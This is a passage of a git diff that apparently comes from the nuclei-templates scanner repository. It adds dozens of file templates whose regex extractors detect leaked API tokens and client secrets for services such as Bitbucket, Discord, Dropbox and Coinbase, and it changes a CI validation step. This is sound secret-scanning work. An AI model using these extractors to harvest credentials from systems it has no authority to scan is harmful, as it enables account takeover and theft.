diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index c7beb05704..005e5387b7 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -25,5 +25,5 @@ jobs: - name: Template Validation run: | cp -r ${{ github.workspace }} $HOME - nuclei -duc -validate - nuclei -duc -validate -w ./workflows \ No newline at end of file + nuclei -duc -validate -allow-local-file-access + nuclei -duc -validate -w ./workflows -allow-local-file-access \ No newline at end of file diff --git a/.new-additions b/.new-additions index 89b2f68224..0be803798b 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,94 @@ +file/keys/beamer-api-token.yaml +file/keys/bitbucket/bitbucket-client-id.yaml +file/keys/bitbucket/bitbucket-client-secret.yaml +file/keys/bittrex/bittrex-access-key.yaml +file/keys/bittrex/bittrex-secret-key.yaml +file/keys/clojars-api-token.yaml +file/keys/codecov-access-token.yaml +file/keys/coinbase-access-token.yaml +file/keys/confluent/confluent-access-token.yaml +file/keys/confluent/confluent-secret-token.yaml +file/keys/contentful-api-token.yaml +file/keys/databricks-api-token.yaml +file/keys/datadog-access-token.yaml +file/keys/discord/discord-api-token.yaml +file/keys/discord/discord-cilent-secret.yaml +file/keys/discord/discord-client-id.yaml +file/keys/doppler-api-token.yaml +file/keys/droneci-access-token.yaml +file/keys/dropbox/dropbox-api-token.yaml +file/keys/dropbox/dropbox-longlived-token.yaml +file/keys/dropbox/dropbox-shortlived-token.yaml +file/keys/duffel-api-token.yaml +file/keys/easypost/easypost-api-token.yaml +file/keys/easypost/easypost-test-token.yaml +file/keys/etsy-access-token.yaml +file/keys/facebook/facebook-api-token.yaml +file/keys/fastly-api-token.yaml +file/keys/finicity/finicity-api-token.yaml +file/keys/finicity/finicity-client-secret.yaml +file/keys/finnhub-access-token.yaml +file/keys/flickr-access-token.yaml +file/keys/flutter/flutterwave-encryption-key.yaml +file/keys/flutter/flutterwave-public-key.yaml +file/keys/flutter/flutterwave-secret-key.yaml +file/keys/frameio-api-token.yaml +file/keys/freshbooks-access-token.yaml +file/keys/gitter-access-token.yaml +file/keys/gocardless-api-token.yaml +file/keys/grafana/grafana-api-key.yaml +file/keys/grafana/grafana-cloud-api-token.yaml +file/keys/grafana/grafana-service-account-token.yaml +file/keys/hashicorp-api-token.yaml +file/keys/zendesk-secret-key.yaml http/cves/2017/CVE-2017-7925.yaml +http/cves/2023/CVE-2023-28665.yaml +http/cves/2023/CVE-2023-3345.yaml +http/cves/2023/CVE-2023-3460.yaml http/cves/2023/CVE-2023-37270.yaml -miscellaneous/spnego.yaml +http/default-logins/yealink/yealink-default-login.yaml +http/exposed-panels/anaqua-login-panel.yaml +http/exposures/tokens/beamer/beamer-token.yaml +http/exposures/tokens/bitbucket/bitbucket-clientid.yaml +http/exposures/tokens/bitbucket/bitbucket-clientsecret.yaml +http/exposures/tokens/bittrex/bittrex-accesskey.yaml +http/exposures/tokens/bittrex/bittrex-secretkey.yaml +http/exposures/tokens/clojars/clojars-token.yaml +http/exposures/tokens/codecov/codecov-accesstoken.yaml +http/exposures/tokens/coinbase/coinbase-accesstoken.yaml +http/exposures/tokens/confluent/confluent-accesstoken.yaml +http/exposures/tokens/confluent/confluent-secretkey.yaml +http/exposures/tokens/contentful/contentful-token.yaml +http/exposures/tokens/databricks/databricks-token.yaml +http/exposures/tokens/datadog/datadog-accesstoken.yaml +http/exposures/tokens/discord/discord-clientid.yaml +http/exposures/tokens/discord/discord-clientsecret.yaml +http/exposures/tokens/discord/discord-token.yaml +http/exposures/tokens/doppler/doppler-token.yaml +http/exposures/tokens/droneci/droneci-accesstoken.yaml +http/exposures/tokens/dropbox/dropbox-long-token.yaml +http/exposures/tokens/dropbox/dropbox-short-token.yaml +http/exposures/tokens/dropbox/dropbox-token.yaml +http/exposures/tokens/duffel/duffel-token.yaml +http/exposures/tokens/easypost/easypost-testtoken.yaml +http/exposures/tokens/easypost/easypost-token.yaml +http/exposures/tokens/etsy/etsy-accesstoken.yaml +http/exposures/tokens/facebook/facebook-token.yaml +http/exposures/tokens/fastly/fastly-token.yaml +http/exposures/tokens/finicity/finicity-clientsecret.yaml +http/exposures/tokens/finicity/finicity-token.yaml +http/exposures/tokens/finnhub/finnhub-accesstoken.yaml +http/exposures/tokens/flickr/flickr-accesstoken.yaml +http/exposures/tokens/flutter/flutterwave-encryptionkey.yaml +http/exposures/tokens/flutter/flutterwave-publickey.yaml +http/exposures/tokens/flutter/flutterwave-secretkey.yaml +http/exposures/tokens/frameio/frameio-token.yaml +http/exposures/tokens/freshbooks/freshbooks-accesstoken.yaml +http/exposures/tokens/gitter/gitter-token.yaml +http/exposures/tokens/gocardless/gocardless-token.yaml +http/exposures/tokens/grafana/grafana-cloud-token.yaml +http/exposures/tokens/grafana/grafana-key.yaml +http/exposures/tokens/grafana/grafana-serviceaccount-token.yaml +http/exposures/tokens/hashicorp/hashicorp-token.yaml +http/exposures/tokens/zendesk/zendesk-key.yaml +http/miscellaneous/spnego.yaml diff --git a/file/keys/beamer-api-token.yaml b/file/keys/beamer-api-token.yaml new file mode 100644 index 0000000000..e000a0b4a5 --- /dev/null +++ b/file/keys/beamer-api-token.yaml @@ -0,0 +1,22 @@ +id: beamer-api-token + +info: + name: Beamer API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.go + metadata: + verified: true + tags: beamer,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:beamer)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(b_[a-z0-9=_\-]{44})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/bitbucket/bitbucket-client-id.yaml b/file/keys/bitbucket/bitbucket-client-id.yaml new file mode 100644 index 0000000000..fb1a6b2891 --- /dev/null +++ b/file/keys/bitbucket/bitbucket-client-id.yaml @@ -0,0 +1,22 @@ +id: bitbucket-client-id + +info: + name: BitBucket Client ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.go + metadata: + verified: true + tags: bitbucket,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/bitbucket/bitbucket-client-secret.yaml b/file/keys/bitbucket/bitbucket-client-secret.yaml new file mode 100644 index 0000000000..5320710594 --- /dev/null +++ b/file/keys/bitbucket/bitbucket-client-secret.yaml @@ -0,0 +1,22 @@ +id: bitbucket-client-secret + +info: + name: BitBucket Client Secret + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.go + metadata: + verified: true + tags: bitbucket,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/bittrex/bittrex-access-key.yaml b/file/keys/bittrex/bittrex-access-key.yaml new file mode 100644 index 0000000000..5d759a86c5 --- /dev/null +++ b/file/keys/bittrex/bittrex-access-key.yaml @@ -0,0 +1,22 @@ +id: bittrex-access-key + +info: + name: Bittrex Access Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.go + metadata: + verified: true + tags: bittrex,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/bittrex/bittrex-secret-key.yaml b/file/keys/bittrex/bittrex-secret-key.yaml new file mode 100644 index 0000000000..22927db671 --- /dev/null +++ b/file/keys/bittrex/bittrex-secret-key.yaml @@ -0,0 +1,22 @@ +id: bittrex-secret-key + +info: + name: Bittrex Secret Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.go + metadata: + verified: true + tags: bittrex,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/clojars-api-token.yaml b/file/keys/clojars-api-token.yaml new file mode 100644 index 0000000000..84986e8cbc --- /dev/null +++ b/file/keys/clojars-api-token.yaml @@ -0,0 +1,22 @@ +id: clojars-api-token + +info: + name: Clojars API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.go + metadata: + verified: true + tags: clojars,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(CLOJARS_)[a-z0-9]{60} \ No newline at end of file diff --git a/file/keys/codecov-access-token.yaml b/file/keys/codecov-access-token.yaml new file mode 100644 index 0000000000..e6df4554b7 --- /dev/null +++ b/file/keys/codecov-access-token.yaml @@ -0,0 +1,22 @@ +id: codecov-access-token + +info: + name: Codecov Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.go + metadata: + verified: true + tags: codecov,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:codecov)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/coinbase-access-token.yaml b/file/keys/coinbase-access-token.yaml new file mode 100644 index 0000000000..8892a9a732 --- /dev/null +++ b/file/keys/coinbase-access-token.yaml @@ -0,0 +1,22 @@ +id: coinbase-access-token + +info: + name: Coinbase Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.go + metadata: + verified: true + tags: coinbase,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:coinbase)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/confluent/confluent-access-token.yaml b/file/keys/confluent/confluent-access-token.yaml new file mode 100644 index 0000000000..caf2b34f3f --- /dev/null +++ b/file/keys/confluent/confluent-access-token.yaml @@ -0,0 +1,22 @@ +id: confluent-access-token + +info: + name: Confluent Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.go + metadata: + verified: true + tags: confluent,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/confluent/confluent-secret-token.yaml b/file/keys/confluent/confluent-secret-token.yaml new file mode 100644 index 0000000000..dfce7ab9ff --- /dev/null +++ b/file/keys/confluent/confluent-secret-token.yaml @@ -0,0 +1,22 @@ +id: confluent-secret-token + +info: + name: Confluent Secret Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.go + metadata: + verified: true + tags: confluent,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/contentful-api-token.yaml b/file/keys/contentful-api-token.yaml new file mode 100644 index 0000000000..cca691374d --- /dev/null +++ b/file/keys/contentful-api-token.yaml @@ -0,0 +1,22 @@ +id: contentful-api-token + +info: + name: Contentful Delivery API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.go + metadata: + verified: true + tags: contentful,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:contentful)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{43})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/databricks-api-token.yaml b/file/keys/databricks-api-token.yaml new file mode 100644 index 0000000000..aadaf4675a --- /dev/null +++ b/file/keys/databricks-api-token.yaml @@ -0,0 +1,22 @@ +id: databricks-api-token + +info: + name: Databricks API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.go + metadata: + verified: true + tags: databricks,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)\b(dapi[a-h0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/datadog-access-token.yaml b/file/keys/datadog-access-token.yaml new file mode 100644 index 0000000000..92ffcfdd69 --- /dev/null +++ b/file/keys/datadog-access-token.yaml @@ -0,0 +1,22 @@ +id: datadog-access-token + +info: + name: Datadog Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.go + metadata: + verified: true + tags: datadog,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:datadog)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/discord/discord-api-token.yaml b/file/keys/discord/discord-api-token.yaml new file mode 100644 index 0000000000..28568c6541 --- /dev/null +++ b/file/keys/discord/discord-api-token.yaml @@ -0,0 +1,22 @@ +id: discord-api-token + +info: + name: Discord API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.go + metadata: + verified: true + tags: discord,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/discord/discord-cilent-secret.yaml b/file/keys/discord/discord-cilent-secret.yaml new file mode 100644 index 0000000000..02c90879de --- /dev/null +++ b/file/keys/discord/discord-cilent-secret.yaml @@ -0,0 +1,22 @@ +id: discord-client-secret + +info: + name: Discord Client Secret + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.go + metadata: + verified: true + tags: discord,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/discord/discord-client-id.yaml b/file/keys/discord/discord-client-id.yaml new file mode 100644 index 0000000000..725f8e0f48 --- /dev/null +++ b/file/keys/discord/discord-client-id.yaml @@ -0,0 +1,22 @@ +id: discord-client-id + +info: + name: Discord Client ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.go + metadata: + verified: true + tags: discord,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{18})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/doppler-api-token.yaml b/file/keys/doppler-api-token.yaml new file mode 100644 index 0000000000..925537324a --- /dev/null +++ b/file/keys/doppler-api-token.yaml @@ -0,0 +1,22 @@ +id: doppler-api-token + +info: + name: Doppler API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.go + metadata: + verified: true + tags: doppler,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (dp\.pt\.)(?i)[a-z0-9]{43} \ No newline at end of file diff --git a/file/keys/droneci-access-token.yaml b/file/keys/droneci-access-token.yaml new file mode 100644 index 0000000000..fb9ede3c62 --- /dev/null +++ b/file/keys/droneci-access-token.yaml @@ -0,0 +1,22 @@ +id: droneci-access-token + +info: + name: Droneci Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.go + metadata: + verified: true + tags: droneci,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:droneci)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/dropbox/dropbox-api-token.yaml b/file/keys/dropbox/dropbox-api-token.yaml new file mode 100644 index 0000000000..8393139877 --- /dev/null +++ b/file/keys/dropbox/dropbox-api-token.yaml @@ -0,0 +1,22 @@ +id: dropbox-api-token + +info: + name: Dropbox API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.go + metadata: + verified: true + tags: dropbox,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{15})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/dropbox/dropbox-longlived-token.yaml b/file/keys/dropbox/dropbox-longlived-token.yaml new file mode 100644 index 0000000000..7ba943f750 --- /dev/null +++ b/file/keys/dropbox/dropbox-longlived-token.yaml @@ -0,0 +1,22 @@ +id: dropbox-longlived-token + +info: + name: Dropbox Long Lived API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.go + metadata: + verified: true + tags: dropbox,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{11}(AAAAAAAAAA)[a-z0-9\-_=]{43})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/dropbox/dropbox-shortlived-token.yaml b/file/keys/dropbox/dropbox-shortlived-token.yaml new file mode 100644 index 0000000000..d164b0b3d5 --- /dev/null +++ b/file/keys/dropbox/dropbox-shortlived-token.yaml @@ -0,0 +1,22 @@ +id: dropbox-shortlived-token + +info: + name: Dropbox Short Lived API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.go + metadata: + verified: true + tags: dropbox,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(sl\.[a-z0-9\-=_]{135})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/duffel-api-token.yaml b/file/keys/duffel-api-token.yaml new file mode 100644 index 0000000000..c306cef35a --- /dev/null +++ b/file/keys/duffel-api-token.yaml @@ -0,0 +1,22 @@ +id: duffel-api-token + +info: + name: Duffel API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.go + metadata: + verified: true + tags: duffel,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - duffel_(test|live)_(?i)[a-z0-9_\-=]{43} \ No newline at end of file diff --git a/file/keys/easypost/easypost-api-token.yaml b/file/keys/easypost/easypost-api-token.yaml new file mode 100644 index 0000000000..61013edd56 --- /dev/null +++ b/file/keys/easypost/easypost-api-token.yaml @@ -0,0 +1,22 @@ +id: easypost-api-token + +info: + name: Easypost Test API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.yaml + metadata: + verified: true + tags: easypost,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - EZAK(?i)[a-z0-9]{54} \ No newline at end of file diff --git a/file/keys/easypost/easypost-test-token.yaml b/file/keys/easypost/easypost-test-token.yaml new file mode 100644 index 0000000000..13f04d92f6 --- /dev/null +++ b/file/keys/easypost/easypost-test-token.yaml @@ -0,0 +1,22 @@ +id: easypost-test-token + +info: + name: Easypost Test API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.yaml + metadata: + verified: true + tags: easypost,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - EZTK(?i)[a-z0-9]{54} \ No newline at end of file diff --git a/file/keys/etsy-access-token.yaml b/file/keys/etsy-access-token.yaml new file mode 100644 index 0000000000..a3ee2d3c1c --- /dev/null +++ b/file/keys/etsy-access-token.yaml @@ -0,0 +1,22 @@ +id: etsy-access-token + +info: + name: Etsy Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.go + metadata: + verified: true + tags: etsy,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:etsy)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/facebook/facebook-api-token.yaml b/file/keys/facebook/facebook-api-token.yaml new file mode 100644 index 0000000000..a0a5aa0f54 --- /dev/null +++ b/file/keys/facebook/facebook-api-token.yaml @@ -0,0 +1,22 @@ +id: facebook-api-token + +info: + name: Facebook API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.go + metadata: + verified: true + tags: facebook,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:facebook)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/fastly-api-token.yaml b/file/keys/fastly-api-token.yaml new file mode 100644 index 0000000000..d3376d968c --- /dev/null +++ b/file/keys/fastly-api-token.yaml @@ -0,0 +1,22 @@ +id: fastly-api-token + +info: + name: Fastly API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.go + metadata: + verified: true + tags: fastly,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:fastly)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/finicity/finicity-api-token.yaml b/file/keys/finicity/finicity-api-token.yaml new file mode 100644 index 0000000000..4a18214f75 --- /dev/null +++ b/file/keys/finicity/finicity-api-token.yaml @@ -0,0 +1,22 @@ +id: finicity-api-token + +info: + name: Finicity API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.go + metadata: + verified: true + tags: finicity,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of 